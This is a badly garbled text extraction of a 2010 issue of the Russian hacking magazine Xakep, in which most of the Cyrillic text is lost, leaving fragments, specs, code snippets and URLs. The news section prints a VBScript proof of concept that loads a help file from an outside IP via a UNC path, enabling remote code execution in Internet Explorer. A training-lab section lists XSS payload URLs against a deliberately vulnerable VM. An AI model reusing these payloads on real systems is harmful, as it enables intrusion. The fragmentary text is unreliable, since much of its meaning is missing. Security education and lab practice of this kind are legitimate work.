Вы находитесь на странице: 1из 148

.

100

x 05 () 2010

.
210
:

TROJAN.WINLOCK

05 (136) 2010

$1000
ANDROID
JIT SPRAY IE8: DEP ASLR

GOOGLE
. 22

. 120

DVD



RDP-
. 96

WINDOWS


*NIX-

136

SQLITE

POWERSHELL 2.0

. 78

UNICODE

. 58

INTRO

:
! .
,

,
.

, iPad.
1 ,
.
, ,
.
, . , ,
,

2-3 ,
. Android,
MAEMO, iPhone, Facebook/
,
.
,

: success story
,
.
!
nikitozz, . .
udalite.livejournal.com

CONTENT
MegaNews
004

FERRUM
016
020

026
028
032
037

083

ASUS N61Ja

088

$1000 Android

042
048
052

ccache distcc

Linux

Dr. Web: 18

096

100

Comet -

Easy-Hack

SQLite

VS

064

JIT Spray IE8

Unicode-

JIT-

106
110

RDP-

trojan.winlock

InPrivate

IE8

C++

SYN/ACK
114
120
126
128

IN DA FOCUS

PowerShell 2.0

134

X-Tools

072

Windows *nix-,

058

070

092


Google

038

078

AM2+/AM3

PC_ZONE
022

140
143
144

PSYCHO: PR-

FAQ UNITED

FAQ

8.5

WWW2

web-

048

,
SQLite

064

JIT Spray IE8

JIT-

100

128

trojan.winlock


PowerShell 2.0

O K

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN/ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)

Dr. Klouniz
(alexander@real.xakep.ru)
>

(bergman@gameland.ru)
> xakep.ru
(xa@real.xakep.ru)

/ART

>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)

/DVD

>
Step
(step@real.xakep.ru)

> Unix-
Ant
>

/PUBLISHING
>
, 119021, , .
, . 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824


> GAMES & DIGITAL
(goryacheva@gameland.ru)

>




> Gameland TV

>
(strekneva@gameland.ru)
>

>


>
(ashomko@gameland.ru)
> -

>

(korenfeld@gameland.ru)
>

>

(andrey@gameland.ru)
>

(devald@gameland.ru)
>

(kosheleva@gameland.ru )

>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

. :

. ,

,
.
.


.
.

:
content@gameland.ru
, , 2009

MEGANEWS

MIFRILL

MARIA.NEFEDOVA@GLC.RU

MEGANEWS

3D ? !
LG.
50 40 (LED), W63D
3D ,
.
E50 E40. , 17.5 ,
(CCFL).
45% .
5 , 250 /m2, 5 000 000:1. E50
Smart+: Auto Bright, Dual Web, Cinema Mode Original Ratio,
Two-way Stand, ,
. ,
LG E2350V ( E50) ,
Sustainable Product Certification UL Environment, ,
.

, ,
,
80- .


, ,
. - US-CERT
USB- Energizer DUO,
, . , .
, ESET
Win32/Arurizer.A.
7777- ,
,
, . ,
. Energizer ,
, Energizer DUO , , ,
.
. Metasploit energizer_duo_payload energizer_duo_detect,
.

004

XS


10
2 ,

Winston XS. ,
,


Winston XS. XS
:
( -).
-.
XS

.
X 05 /136/ 10

MEGANEWS


NVidia
,
WHQL 196.75
. , ,
, ,
, .

3D- ,

,
GPU 100C.
, ,
.

, 196.21,
196.75, ,
.
,
Driver Sweeper (www.guru3d.
com/category/driversweeper).

SECUNIA , WINDOWS-
5 .

WINDOWS7


ZeuS . , ,
, ZeuS
. ,
, ,
ZeuS ,


.
. Zeus
Kit 1.3.4.x 3 4
(,
, ),
.
Backconnect $1500, -
Firefox $2000,
Jabber

$500, Vista/Windows 7 $2000.


,
VNC
$10000. .
,
,
,
. Microsoft Windows,
,
, .
,

. , , () ZeuS

1.4. - Firefox (


.

MSI
890GXM-G65, .
AMD
890GX + SB850,
AMD Phenom II,
ATI Radeon HD 4290

HTML-),
.
, ZeuS-
,
.
ZueS ,

.

DirectX 10.1 UVD 2.0


DVI HDMI. SATA 6 / USB 3.0. 890GXMG65 micro ATX
PCI Express x16, PCI Express
x1 PCI. ,
16 DDR3 800, 1066, 1333, 1600, 1800 2133
. CrossFire
Hybrid CrossFire, OC
Genie .

,
RUTRACKER.ORG ( TORRENTS.RU), 5,6 .
006

X 05 /136/ 10

MEGANEWS

, ,
(
, :) ). ,
7996 -
. Code of Trade
Digital Gameland Lays. ,
,
,
Lays. ,
, 400.656.889 ! .

.
J2ME
,
.
Jimm
.
Apple,
,
,
. AppStore,
,
, .
: 170 ,
50 .
, Apple.
iPhone,
.
.
, Android 30
Google,
.

,
. ?
, , -
. ,
, ,
.
.

OFFICE 2010
12 ,
.


, ,
, -,
,
,
, . ,

008

(Popular Science)
,
137 !
, Google Books,
www.popsci.com/archives. ,
,
.
X 05 /136/ 10

!

Thermaltake, mid-tower V5 Black Edition
. ,
? , ( 7,1 508223490 ) 100%
. ,
, :
5.25, 3.5 2.5, ; , ;
eSATA, USB 2.0 . 120-
, 200- ,
120-
. $69.


,
,
. ,
19
,
.
,
15 25 , 3
.
(Stephen Watt) , , . ,
$75 .
. , . ,
.

GOOGLE

, -,
Open Text Corporation Antarctica Systems,
XML, Sun Microsystems,
-.
, Oracle, -
Sun, , .
Google Android,
, , (Now
A No-Evil Zone). ,
Google, Apple iPhone
Android open-source.
: iPhone
, , , ,
. ,
.
, , .
. , ,
Android .

, , . , ,
Google, .
, ,
, . ,
, , , Google
,
. ,
, , ,
Google.cn . , , : ,
, Google
, google.cn
google.com.hk,
.


. , Google
,
.

X 05 /136/ 10

009

MEGANEWS

CAPTCHA
, $25
CAPTCHA?
,
, ,

.
:

,
Ticketmaster, Musictoday
Tickets.com. ,

, ,
IP- . ,
,
CAPTCHA,
( IP-, ).
: 5 10 ,

30 . , ,
reCAPTCHA
, .
,
. captcha,
, .
2002 2009
$25 !
, ,
CAPTCHA.
.
, reCAPTCHA, . , ,
. ,
: https://api-secure.recaptcha.net/image?c=<ID
>.
ID CAPTCHA, .
, ,
, ,
$1-2 1000 ).

70%
.

IE6

Internet Explorer 6 ,
. www.liveinternet.ru,
- 8.8% Opera Mini . , ,
, Google ( YouTube),
Facebook, MobileMe . Google
IE6, .
Aten Design Group ,
- Microsoft,
( ) . : IE6,
MIX, Internet Explorer. Internet
Explorer @ Microsoft. , .



1966 , ,
.
, .
(Association for Computing
Machinery, ACM) $250 . ,
, . 70-
-, Xerox,
Alto.
, , , WYSIWYG. Alto,
Ethernet,
. Microsoft.

010

X 05 /136/ 10

11

MEGANEWS

MYSQL
, MySQL Monty
Sun Microsystems
Oracle, .
,
, ,
open source . ,
.
() Oracle ,
MySQL ,

. , , , ,
Oracle, , , , .

Oracle .

,

42%.

ASUS
Asus ,
, , . , ,
, ASUS Cine5 373x100x80 373x100x100 ,
(
). :
28 (RMS 15 ),
80 20 . ASUS Cine5
3.5 .
(5.1)
. , ,
.





,

,

Mariposa (- ), 13 190 . ,
DNS-,
. ,
Vodafone 3000 HTC Magic,
, Mariposa.
, , Fortune 1000 . , ,
DDP Team. .
Wireshark
(www.paloaltonetworks.com/researchcenter/2009/10/mariposatool), C&C
. : Netkairo,
VPN-
IP.
. Mariposa , -
C&C (comand&control) .

WIMAX FORUM,
WIMAX
620
, 2011
1 .
012

X 05 /136/ 10

013
13

MEGANEWS

,
!

IE6, Microsoft MIX Internet Explorer 9.


: ie.microsoft.com/testdrive,
, .
, , . Internet
Explorer 9 , .
SunSpider IE8
, Opera 10.10 . ,
JavaScript Safari, Chrome Opera 10.50.
HTML5
SVG. CSS3 ,
Acid3 IE9 55
100. GPU- Vista Windows
7, XP XP
.

CANON CANON
,
, Canon ,
, ! ,


2008


,
. ,
, .canon, , ,
,

. Canon ,
URL
. :
ru.a40.canon. Canon
a40.canon.com a40.canon.ru
.
canon.
canon, 2011 ,
ICANN .

WATCHMOUSE , ,
URL- -
.

!
scene.org, ,
.
,
,
Scene.org Awards

014

.
, (

awards.scene.org), :
. , Best Demo, Best Demo on an
Oldschool Platform, Best Effects.
Frameranger

. , ,
geforce 8800,
,
dx9.

Breakpoint, Scene.org Awards.

X 05 /136/ 10

F1 !
Microsoft,
,
, . ,
MS
F1,
( VBScript).
, .
IE ,
.
VBScript,
,
:
MsgBox(prompt[,buttons][,title][,helpfile,context]).

helpfile, ,
,

F1, . ,

. , ,
(http://isec.
pl/poc-isec27) :
<script type="text/vbscript">
big = "\\184.73.14.110\PUBLIC\test.
hlp"
MsgBox "press F1 to close this
annoying popup", ,"", big, 1
</script>


.hlp-,
. ,
Microsoft
,
,
, .

GIGABYTE TECHNOLOGY ASUS


2
3,1-3,3 , 3,2-3,3 .

X 05 /136/ 10

015

MSI
785GTM-E45

FERRUM

MSI
85GTM-E45

IGABYTE
MA785GMTUD2H

GIGABYTE
GA-MA770TUD3P
GIGABYTE
GA-MA785GMTUD2H
ASUS
M4A79T Deluxe

GIGABYTE
GA-MA785GMTUD2H

MSI
790XT-G45
ASUS
M4A78T-E

ASUS
M4A78T-E

AM2+/AM3

, -,
. ,
. , ,
AMD Socket AM2+/AM3


AMD 790FX 790GX.
, SB750. AMD 790GX,
22 PCI Express. , Triple Crossfire
.
? ,
G . ATI Radeon HD3300
. 790, ,
,
. , AMD , 780G 770,
790- 16
PCI-Express. , 780G
ATI Radeon HD 4200. , AMD 790FX, 32 PCI Express,
, . SB750 ,
12 USB-, RAID,
0, 1, 5 10, SATA- .


,
, ,
, . , WinRAR, wPrime 2.00
SuperPi 1.5.
, ,
.

016

:
ASUS M4A78T-E
ASUS M4A79T DELUXE
GIGABYTE GA-MA770T-UD3P
GIGABYTE GA-MA785GMT-UD2H
MSI 790XT-G45
MSI 785GTM-E45
AMD Phenom X4 955 BE (
3.2 ). , , ,
, ,
.
.

BATMAN: ARKHAM ASYLUM, FPS


Palit GeForce GT 240 Sonic
Palit GeForce GT 220 Sonic
Palit GeForce GT 220
Sapphire Radeon HD 5750
Sapphire Radeon HD 4670
Sapphire Radeon HD 4650
0

10

20

30

40

50

60

70

80

NVIDIA
X 05 /136/ 10

GIGABYTE
GA-MA785GMTUD2H

Palit

MSI 7900XT-G45

: 3,2 (16200), AMD Phenom II X4 955 BE


: Sapphire Radeon HD 3450
DDR2: 2x1 , A-DATA AX2U800PB2G4-2P (4-44-12)
DDR3: 2x1 , Aeneon Xtune AXH760UD00-13G
(CL8)
: 1,5 , Seagate Barracuda ST31500341AS
: 750 , Corsair TX750W Power Supply
: 1700 /, Noctua NH-U12P
: Windows XP Professional SP3 x32

ASUS
M4A78T-E

4500 .

: AMD 790GX SB750


: DDR3 800/1066/1333/1600
: AMD RADEON HD 3300
: HIGH DEFINITION AUDIO
LAN: GIGABIT ETHERNET
: 2XPCI EXPRESS X16; 2X PCI EXPRESS X1; 2PCI
: 12XUSB; 2XIEEE1394; IDE; 6XSATA
-, : 24.4X30.5, ATX

ASUS, , .
PCI Express x16, ,
.
, AMD. , .
BCLK
240 , ,
3936 . ,
, .

, ASUS , . , ,
.
X 05 /136/ 10

ASUS

Palit
GeForce GT
240 Sonic

GIGABYTE
GA-MA785GMT
ASUS M4A79T Deluxe
UD2H
0

10

15

20

25

SuperPI 1.5 XS 1m(, )


SuperPI 1.5 XS 1m,

ASUS
M4A79T DELUXE
:

6100 .

: AMD 790FX SB750


: DDR3 1600/1333/1066/800
:
: HIGH DEFINITION AUDIO
LAN: GIGABIT ETHERNET
: 4X PCI EXPRESS X16; 2X PCI
: 12XUSB; 2XIEEE1394; 1XIDE; 6XSATA; 1XFDD; 1SPDIF
IN/OUT
-, : 24.4X30.5, ATX

.
,
AMD Phenom II AM3, DDR3. : AMD Phenom II X4
955 BE 4144 ,
! 259 .
ASUS , M4A79T Deluxe :
, .

, , , ASUS, ,
, BIOS.
, ,
.
. , ,
, , .

017

FERRUM

MSI 7900XT-G45

GIGABYTE GA-MA770TUD3P
ASUS M4A78T-E
0

10

15

wPrime 2.00 32 m ,
wPrime 2.00 32 m ,

wPrime 2.00 ASUS

GIGABYTE
GA-MA785GMT-UD2H

GIGABYTE
GA-MA770T-UD3P
:

3000 .

: AMD 770 SB710


: DDR3 1600/1333/1066/800
:
: 8- REALTEK ALC888
LAN: REALTEK 8111C/D(L) (10/100/1000 )
: 1XPCI EXPRESS X16; 2XPCI; 4X PCI EXPRESS0X1
: 8XUSB; 1XPS/2 (); 1XPS/2 ();
6XSATA; 1XSPDIF IN; 1XSPDIF OUT; 1XIDE; 2XIEEE 1394A
-, : 24.4X30.5, ATX

, , .
PCI, PCI Express x1 PCI Express x16
, , ,
. ,
, .
4 ,
. ,
.

,
. PCI, IDE.
,
, IDE-
. , ,
-, ( 90 ), , -, IDE
.

018

3000 .

: AMD 785G SB710


: DDR3 1800 (OC)/1666/1333/1066
: AMD RADEON HD 4200
: 8- REALTEK ALC
LAN: REALTEK 8111C
: 1XPCI EXPRESS X16; 2X PCI; 1XPCI EXPRESS X1;
: 1XIDE; 1XIEEE 1394A; 1XLPT; 1XSPDIF IN/OUT; 1XD-SUB;
1XDVI-D; 1XESATA; 1HDMI; 1XPS/2 (); 1XPS/2 ();
1XRJ45 LAN; SPDIF OUT; 6XUSB
-, : 24.4X21.8, MICROATX

MicroATX . ,
,
, . ,
, Gigabyte ATI Radeon HD 4200,
, .
, Ultra Durable 3, ,
.

,
. , , PCI
SATA PCI Express
x16 . ,
225 .
.
X 05 /136/ 10

MSI 7900XT-G45

GIGABYTE GA-MA770TUD3P
ASUS M4A78T-E
0

1000

2000

3000

WinRAR .
WinRAR .

MSI
790XT-G45

2800 .

: AMD 790X SB710


: DDR2 1066/800/667/533
:
: 8- REALTEK ALC889 / ALC885
LAN: REALTEK ALC889 / ALC885
: 2PCI EXPRESS X16; 2PCI EXPRESS X1; 2PCI
: 1FDD; 6X SATA; 1XATA133 HD; 1XSPDIF-OUT; 1XTPM;
1XPS/2 (); 1XPS/2 (); 6XUSB; 1XCOM
-, : 24.4X30.5, ATX

, MSI 790XT-G45
PCI Express x16,
. ,
. , ,
, 243 ,
. , , .


. , COM-
FDD, . , DDR2,
,
, DDR3.

,

AMD AM2+/AM3

X 05 /136/ 10

2400 .

MSI
785GTM-E45

: AMD 785G SB710


: DDR2 1066/800/667/533
: AMD RADEON HD 4200
: REALTEK HIGH-END AUDIO
LAN: REALTEK ALC889 / ALC885
: 1PCI EXPRESS X16; 2PCI; 1PCI EXPRESS X1
: 1XIDE; 4XUSB; 6XSATA; 1XATA133; 1XSPDIF OUT; 1XTPM;
1XPS/2 (); 1XPS/2 (); 4XUSB; 1XRJ45; 1XDVI-D;
1XVGA; 1XHDMI
-, : 24.4X21.8, MICROATX

,
. , ,
243 , ,
MSI 790XT-G45. . , MSI 785GTM-E45 - MicroATX,
.
, ATI Radeon HD 4200,
, PCI Express x16.

, .
, ,
, , .

.
,
, . ASUS M4A79T

Deluxe, .
,
.
GIGABYTE GA-MA770T-UD3P
. z

019

FERRUM

ASUS N61Ja


.
, , ASUS N61Ja
.
.

,

.
, ASUS N61Ja Intel Auburndale IMC
Intel Core i7-620M,
2,67 ,
3,3
Intel Turbo Boost.
.
CPU,

Super PI. -

020



13
, . ,
Intel Core i7.

ASUS N61 Intel Core i5-430M,
NVIDIA
Optimus , , GeForce GT325.
.

. 640
.


, .
16 LED-


1366x768.
.
, .
USB 3.0

.
USB 2.0,
. ,
(
)
ATI Mobility Radeon
X 05 /136/ 10

HD 5730 Intel GMA HD.


,
.
. , ,
.
.

ASUS N61Ja . ASUS


N61 , , ,
. ,
,
, .
,
. -, ,
-, .

. Num Pad. multitouch,

. , .
( )
.
, .
.
.
: (
), , ,
. ,
.
ASUS N61J . ,
, , .

. , .

Futuremark, ,
(Geekbench Crystalmark). Super PI (,

) , WinRAR (
).
, -
,

SuperPI mod.1.5 XS, 1M: 13,4


WinRAR: 1124 /
3DMark03: 21717
3DMark06: 7789
CrystalMark 2004R2: 149254
Geekbench: 4841
PassMark Performance Test: 704,3
CPU/HDD: 51/34
: 2 32
Wi-Fi: 2 18
: 1 33

X 05 /136/ 10


: 16, 1366x768,
: Intel Core i7-620M, 2.67
: Intel HM55 Express Chipset
(Auburndale IMC)
: 4096 DDR3-1066
: ATI Mobility Radeon HD 5730,
1024 + Intel GMA HD
: 640 , Toshiba
MK6465GSX, SATA HDD, 5400 /
: HL-DT-ST GT30N, DVD-RW
: 1 USB 3.0, 2x USB 2.0, 1x e-SATA,
ExpressCard/34, HDMI, VGA, 2xAudio, -
: Wi-Fi 802.11b/g/n,
Bluetooth 2.1+EDR, LAN
: 4400 , Li-ion
: Windows 7 Ultimate x64
, : 384x264,9x37,3
: 2,79
.
Readers Test ( , Battery Eater
Pro 2.5), Wi-Fi.
,
.
DVD- ,
, .

. ,
- , . -,
, . -
. -,
, . ,
. ,
, ASUS N61Ja . z

ASUS N
trendclub.ru.
Trend Club ,
. Trend Club , ,
.
Trend Club Intel ASUS .
Intel, , , ,
. Intel Web Intel http://www.intel.ru, http://blogs.intel.com.
Intel
www.intel.ru/rating.

021

PC_ZONE
dotcypress@gmail.com

$1000
ANDROID


Google
.
. Android .
2 $1000.
, :)!
,
, .
, ,
. ,
,

Android.
,
.

ANDROID?

Google Andoid ,
Linux. Google,

Android, Inc.,
2005 , . 2008
. Android
,
.

022

100
Android HTC, Motorola, Samsung, Dell,
Huawai, Sony Ericsson
. , Google,
60
Android-
, . ,
, Google?

HTC G1 .
. ,
,

- , HTC
Nexus One Motorola Droid.

, .

ANDROID

. ,
,
, .

,
,
, ,
. ,
, Apple,
App Store. Nokia Nokia Ovi Store, Microsoft
Windows Phone
Microsoft Market
Place. Android
Android Market.
-,
X 05 /136/ 10

Android Market


-.
,
. , : App Storee ,
,
Android Market
. iPhone
,

, ,
,
. Android Market
.
:
iPhone
AppStore, Android
.
,
, .
Android
, . , Android Market ,
30 . ,
App Store,
. Market (
),
, ,
.
, Google Checkout,
, PayPal, . , ,
ex-USSR
. (
), X 05 /136/ 10

Android
- , .

, . moneyback
24 .

, , ,
? :) , :
, , .
,
, .
, Android Market,
.
, Google -, ,
, .

, . ,
Android
Market ( ), , $25.
. ? ! ,
( ),
.
,
Merchant Account Google Checkout, ,
, . PayPal,
,

. !
,
.
,
. -,

10-20% . ,
. , -
, .
:
SlideME (www.slideme.org);
AppsLib (www.appslib.com/developers);
AndAppStore (andappstore.com).


Android Market:

. ,
, . SlideME

. , , ,
, . Android
,
.
,
iPhone,
Android. ,
. Android, ,
.
SlideME :

.

023

PC_ZONE

Xmas Tree Quattro Wireless

Xmas Tree,
$1500 2

$$$

, . :

,
, .
,
. AdWare,
.
,
,


- .
, -

024

! (, ) ,

Android Market,
.
. ,

, ,
. ,
-,
- ,
:
Quattro Wireless (quattrowireless.com);

AdMob (admob.com).
: ,

.
, .

,

.
, .
,
/ (
CTR),
, ,
.
:
,
, . :
, ,
adult-.

,

.

, Android Market.
,
, . Android
Market (market.android.com/publish/Home),
, . 5
,

.

,
: 2
200 .
2009 1100 .
, .
.
Xmas Tree

wallpaper'
.
,
X 05 /136/ 10

INFO


ANDROID?


Java. ,
:
Android SDK (developer.android.com/sdk);
IDE Java (Eclipse, IntelliJ IDEA,
NetBeans ).

developer.android.com.
Google Android
, . developer.
android.com
IDE, ,
,
. Android
Native Development Kit .

Android,
SDK
USB.
, SDK
(developer.android.com/guide/developing/
tools/emulator.html).
,
. Android
Emulator'
, , , SMS , ..
, .
,

Google Android. :
,
WebView, . , ,
JavaScript
( Flash').

. ,
,

Android.

,
. AdWhirl
(www.adwhirl.com),
Admob Quattro
Wireless. ,
,
( ). Adwhirl SDK,
.

Android Emulator'

X 05 /136/ 10

:


. ,
- Android Market' www.
androlib.com. ,
2-3 , ,
Java, . 6 ,
.
Quattro Wireless 2
100 . Admob.com , , .
: , PayPal,
EFT.
Quattro Wireless,
PayPal, .
EFT
( ).
( , SWIFT
,
).
. $30, ,
.
, , ,
.
,
. , Android
..z

info

Android Market
,
,
, ,
, , , ,

.

Merchant Account
Google Checkout.

,
,
SIM-
(,
T-Mobile). MarketEnabler (code.
google.com/p/marketenabler) MarketAccess
(amip.org.ru/wiki/
android/marketaccess).

DVD
dvd

SDK

Android.

HTTP://WWW
links

Android: androiddevelopers.blogspot.com

Android: developer.
android.com/videos
100 Android,
:
www.googleandblog.
com/over-100different-androidphones/31530

025

PC_ZONE
lenskyi.d@gmail.com

DR.
WEB:
18
-

Doctor Web
1992 . , ,
,
, .
- .
, , Dr.Web
.
, .

, . ,
Dr.Web
.


.,
..

, ,
. ,

,
. ,

: ,
.
?
Dr.Web
CureIt!,
. ,
Dr.Web, , ,
.

- -

026


Dr.Web Security Space Pro,
.
,

,
. ! ,
(
CureIt!),
. ,

Snapshot',
, - .
, ,
.
,
. ,


( Dr.Web
SelfPROtect). ,
,
CAPTCHA'
, .
, :
,
,
(
, ).
API-
.

,
.
, Dr.Web
.
, .

, ,
.
, , , .
: ,
, , , .
,

.
- ,

(,
? !).
Windows XP

.

,
TrueImage.
,
? , , -
! .
- ,
, ,
,
, , ,
, .
, NTFS
, , , .
,
X 05 /136/ 10

SpIDer Guard'
RUSTOCK.C
MAOSBOOT
SHADOW.BASED
R SECTOR
MEBROOT
TDL
BOAXXE
XORPIX
TROJAN-SPY.ZBOT
TROJAN.OKUKS
TDL3

+
+
+
+
+
+
+
+
+
+


,
, .
,
, + .
,
Mebroot', ,
,
.
SpIDer Guard,
,
. , ,
GMER ,

.


, Dr.Web Security Space Pro
. ,
. ,
,
:
.
,
Dr.Web
Security Space Pro. (, ..)

,
.
, HTTP- SpIDer Gate.

Firefox'
:).
-,

HTTP-

. ,
HTTP-,
www.malwareurl.com,
: SpIDer Gate
iframe' JS-.
,

Dr.Web,
. SpIDer Mail ,
.
, ,

.

, Dr.Web
Security Space Pro . ,

,
, ,

. ,
: - . z
X 05 /136/ 10

027

PC_ZONE
aleks.raiden@gmail.com

Presence

Real Time Web

XMPP

Push, not pull


FlashSocket

BOSH

WebSocket

Strophie

Kaazing

APE

Comet

Jetty

node.js

js.io

Realtime
-

Comet
-

- . AJAX, . , , , ,
. Comet.

-,
,
HTML- ,
, .
. ,
,
.

.
,

. ,
-,
-
. -,

028

,
, , , Comet.

AJAX

,
, , , .
, Comet
,
( )
.

, -
.
AJAX, , -

, .
, AJAX
,
, . ,
AJAX ,
, HTTP, -. Comet,
, ,
.
Comet'
, (),
,
serverX 05 /136/ 10

AJAX ,
.. 2.0
push.
: ,

. ,
Flash, , .
-
AJAX, Flash,
, .
Comet JavaScript + HTML,

.

Comet
?
, , , -
XMLHttpRequest,
JavaScript , .

HTTP-: URL
. , AJAX

(/),
, 10 ,
, .
,
: ,
,

, . ,
,
.

:
, ,
.
, AJAX
.
Comet'. ( Long-polling, )
,
.
:
, ,
. ,
, :
- ,
. ,
,
!

.
,
. 5 ,
. ,
,
HTTP .

(Streaming) ,
,
. ,
,
-
. ,
,
,
,
,
Long-polling.
, ,
. , , ,
, ,
?
?
HTTP-
,

. ,
.

, Comet,
- -

Comet' Streaming

X 05 /136/ 10

Ajax' Comet-.
10 .
: .

(hidden iframe).
Comet',
HTML- ,
.
: <iframe>,
-.
HTML-:
, JavaScript,
,
. ,
, , - ,
.
, :
- .

<script>, . ,
.

, - ,
: , .
, ,
<script>,
, .
, 5 ( ).
,
, .
, , , , .
( JS- jQuery):

029

PC_ZONE

WEBSOCKETS!

Long-Poling

WebSockets,

HTML 5
var error_timer_id = null;
function error_iframe()
{
$('#comet_iframe_panel').
empty().append('<iframe
src="comet.domain.com/comet.
php?user_id=1"></iframe>');
}
function comet_ping()
{
clearInterval(error_timer_id);
setInterval(function(){ error_
iframe(); }, 5000);
}
function comet_new_message(msg)
{
$('#comet_msg_content').
append('<div>' + msg.time + ': '
+ msg.text + '</div>');
comet_ping();
}

, ,
(
PHP):
$timeout = 1000;
$running = true;
while($running)
{
$msg = '{time:'.date('m:s',
time()).',text:Server says:
OK!}';
echo '<script>comet_new_
message(.$msg.);</script>;
usleep($timeout);
}


Comet',

030

.
- .
, ,
,
. .
,
, gzip-
Comet .
,
, .
,
,
iframe.

, .
Longpolling
JavaScript :
, jQuery :
$.getJson(http://comet.domain.
com/comet.php, function(response)
{});.

, :
,
, . , JSON,
,
AJAX.

,
!

, omet-
,
.
.
JavaScript

. !
. Comet': , ,
(,
Lightstreamer 50 ).

,

HTML 5
, ,
.
-.
,
,
.
, WebSockets
HTTP-,

()
.
: HTTPGET ,

,

TCP- !
TCP- ,
, HTTP-.
- ,

,
UTF-8 (
)
.
-
AJAX
Comet.
, , -,
Google Chrome. -
, ,
. web-socket-js (github.com/gimite/
web-socket-js), API,
,
Flash-,

, .
,
API,
.
Cometd (cometd.org), HTTP_Push_Module
(pushmodule.slact.net), APE push engine (www.
ape-project.org).

, Denwer,
.
Dklab_Realplexor Perl ,
,

.
long-polling,
, ,
JavaScript .

- ,
,
.
, - JS- X 05 /136/ 10

LONG-POLLING VS. STREAMING


? . , ,
(,
/ , ),
Long-polling
.
,
JavaScript,
AJAX-.
,
,
, , , . , ,
,
. . , ,
,
.
Comet-
,

, !
,
callback, .
,
, ,
.

(,
)
( ,
,
).

. AJAX',
Comet.
( ).
, PHP:
// ,

include_once(Dklab/Realplexor.php);
//
$dklab = new Dklab_Realplexor("127.0.0.1",
"10010", "xakep_");
//10010
//xakep_ ,

$_to = Array(all_online); // , .
, ,

$_message = Array('text' => ' !, 'author' => ', 'time' =>


time());
X 05 /136/ 10

// , JSON
$dblab->send($_to, $_message);
// !

JavaScript , , :
//
var comet = new Dklab_Realplexor('http://
rpl.domain.com', 'xakep_');
//

// ,

comet.subscribe("all_online", function (msg,
id){
//

//id
$('#comet_msg').append('<div><b>' + new
Date(msg.time * 1000).toLocaleString() +
'</b> ' + msg.author + ': ' + msg.text +
'</div>');
// ,
-
JSON
});
come.execute(); //

//
,
comet.execute(),
//,
comet.unsubscribe(all_online);

Comet
- . ,
,
, . ,
Comet ,
Dklab_Realplexor.
- . ,
Dklab_Realplexor
, , Facebook'e.
HTML5
, HTTP,
, , , - , .
? Comet
, -,
..z

INFO

info

Comet
, ,
comet.domain.com,


26
,

,
, .
.

HTTP://WWW
links
:
websockets.ru/tech/
intro

AJAX-:
javascript.ru/ajax/intro

:
Java atmosphere.dev.
java.net;
.NET www.
frozenmountain.com;
Python orbited.org;
Ruby juggernaut.
rubyforge.org;
PHP github.com/
kakserpom/phpdaemon.

031

PC_ZONE
Step step@glc.ru

.
, ? , , VPN ? , ? !
: ?. : , .
, . , ,
,
,
. ?
,
? .
, , . , -,
,
. ,
-, , ,

.
, , ,
. !
,
, .
,
.
, .

,
,
,
, -

032

.
,
][- (, , ring0cup.ru),

-,

. .

DAMN VULNERABLE WEB APP

-
, WAF (
-) ,
. Damn Vulnerable Web App,

, , - ,
:).
- ,

.
PHP/
MySQL,
DVWA.
-,
:
Denwer' (www.denwer.ru) XAMPP' (www.
apachefriends.org/xampp-en.html). ,

public html-
http://127.0.0.1/dvwa/index.php.
:
Create / Reset Database.
- ,
/config/config.
inc.php.
PHP: , PHP.ini
.
magic_quotes_gpc = Off
allow_url_fopen on
allow_url_include on

, 2009
,
X 05 /136/ 10

bat. J2EE.
3.
http://localhost/WebGoat/attack.
4. guest/guest.
5. .
, ,
. ,
SQL-

.
, .

SECURIBENCH

, SQL inj/XSS
,
.

MUTILLIDAE


-
.

,
.
:
,
-.
Mutillidae.
OWASP
Top 10: SQL-, XSS, CSRF
,
.
,
. DWVA,

XAMPP-,
Setup/
reset the DB .

OWASP
Top 10 (www.owasp.org/index.php/OWASP_
Top_Ten_Project) , ,
Mutillidae. ,
.

WEBGOAT

Mutillidae ,

, , , WebGoat. ,
OWASP (Open Web Application Security
Project),
security-.

PHP-, , Java.
J2EE-
X 05 /136/ 10

J2EE


WebGoat,
Stanford SecuriBench. ,
,
8 .
Java:
jboard, blueblog
. ,
,
.
, ,
,

SecuriBench J2EE

TomCat- ,
WebGoat , :
1. WebGoat-OWASP_
Standard-x.x.zip .
2. TomCat', webgoat.


,
.
,
. -
][-, , .
ring0cup.ru,
, ,
, , . , ,
:
mod-x.com. ModX, .
, ,
.
hax.tor.hu/welcome. , 5
.
quest.fsb-my.name/index.php. ,
, .
vicnum.ciphertechs.com. Capture the flag,
][-. , , (sourceforge.net/projects/vicnum).
. , ,
, hackergames.net, 150
, .

033

PC_ZONE

Moth VMware

WARNING

info


.

,

.

DVD
dvd




DVD

034

. , SecuriBench
,
, Tomcat.
,
,
, ,
SecuriBench , .

MOTH

,
Moth.
,
,
Ubuntu 8.10. , , , VMware,
,
VMware Player (www.vmware.com/products/
player). Moth
DHCP-, ,
( , ,
IP , Bridged,
).
,
(moth/moth), ifconfig'
IP Moth :
http://<moth-ip_address>. ,
:
Wordpress 2.6.5, Vanilla 1.1.4
PHP/MySQL, Java + Tomcat6 +
MySQL. : ,
mod_security, PHP-IDS:
1. http://moth/w3af/audit/xss/simple_xss.
php?text=<script>alert('xss');</script>
2. http://moth/mod_security/w3af/audit/xss/simple_
xss.php?text=<script>alert('xss');</script>
3. http://moth/php-ids/w3af/audit/xss/simple_
xss.php?text=<script>alert('xss');</script>
Mod_security PHP-IDS WAF (Web
Application Firewall)
- (
- ).

, -

, WAF .
,
,
Python Ruby.

Moth
. ,
, Moth ,
.
,
w3af (w3af.sourceforge.net),

-. ,

. ,
? , Acutenix WVS
: testphp.acunetix.
com, testasp.acunetix.com, testaspnet.acunetix.com.
HP ( HP WebInspect)
zero.webappsecurity.com.
IBM Rational AppScan demo.testfire.net.
,
.

Damn Vulnerable Linux

pWnOS
- ,
root'. : , X 05 /136/ 10


 




03&*
 /"4 
*/5&-$






*(
(#*"!&! 
$
